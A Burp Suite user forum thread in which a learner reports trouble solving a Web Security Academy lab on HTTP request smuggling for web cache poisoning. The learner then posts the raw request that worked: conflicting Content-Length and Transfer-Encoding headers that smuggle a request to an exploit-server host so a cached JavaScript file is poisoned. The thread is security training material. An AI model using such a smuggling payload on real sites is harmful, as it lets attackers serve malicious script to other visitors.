Burp Suite User Forum

Create new post

Exploiting HTTP request smuggling to perform web cache poisoning - Not getting results.

Gourav | Last updated: Oct 18, 2021 08:31AM UTC

I have been trying to solve this lab for a while now. I have tried to do this using the community edition and the professional version. I get the final alert cookie displayed in the browser but not inside a JS. I have even waited for the labs to reset and then tried but to no avail. Actually I am facing these issues with three HTTP request smuggling labs and in every single one of them I am trying the solution mentioned in the lab website. Please help.

Gourav | Last updated: Oct 18, 2021 08:49AM UTC

No idea, why it works with the content length = 193. But I was able to solve the lab. This is what I used. POST / HTTP/1.1 Host: acfb1ff41fc0eb70c03ba87e008c000d.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 193 Transfer-Encoding: chunked 0 GET /post/next?postId=3 HTTP/1.1 Host: exploit-ac6a1f321fcaeb3dc0f4a8cc013d002c.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 10 x=1 GET /resources/js/tracking.js HTTP/1.1 Host: acfb1ff41fc0eb70c03ba87e008c000d.web-security-academy.net Connection: close

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.